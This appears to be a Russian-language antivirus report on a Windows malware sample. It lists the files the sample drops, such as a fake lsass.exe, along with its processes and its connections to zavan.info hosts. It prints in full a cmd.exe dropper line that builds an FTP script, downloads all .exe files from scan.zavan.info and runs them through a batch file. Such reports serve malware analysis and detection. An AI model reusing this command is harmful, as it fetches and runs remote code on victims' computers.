Техническая информация
- '<Текущая директория>\lsass.exe'
- '<Текущая директория>\lsass.exe' (загружен из сети Интернет)
- '<SYSTEM32>\ftp.exe' -i -s:k.x
- '<SYSTEM32>\cmd.exe' /c md IvRaN&cd IvRaN&del /f /s /q *.*&echo open scan.zavan.info>k.x&echo out >>k.x&echo 123 >>k.x&Echo mget *.exe >>k.x&Echo bye>>k.x&ftp -i -s:k.x&echo for %%i in (*.exe) do start %%i^&ping 127.0.0.1 -n 5 >D.bat&D.bat&del D.bat
- <Текущая директория>\lsass.exe
- <Текущая директория>\IvRaN\D.bat
- <Текущая директория>\IvRaN\k.x
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\update[1].exe
- <Полный путь к вирусу>
- 'localhost':1041
- 'sc##.zavan.info':21
- 'localhost':1040
- 'ip#.#avan.info':80
- 'wo###.zavan.info':80
- wo###.zavan.info/update.exe
- wo###.zavan.info/info.asp
- ip#.#avan.info/ip.asp
- DNS ASK sc##.zavan.info
- DNS ASK ip#.#avan.info
- DNS ASK wo###.zavan.info
- ClassName: 'Shell_TrayWnd' WindowName: ''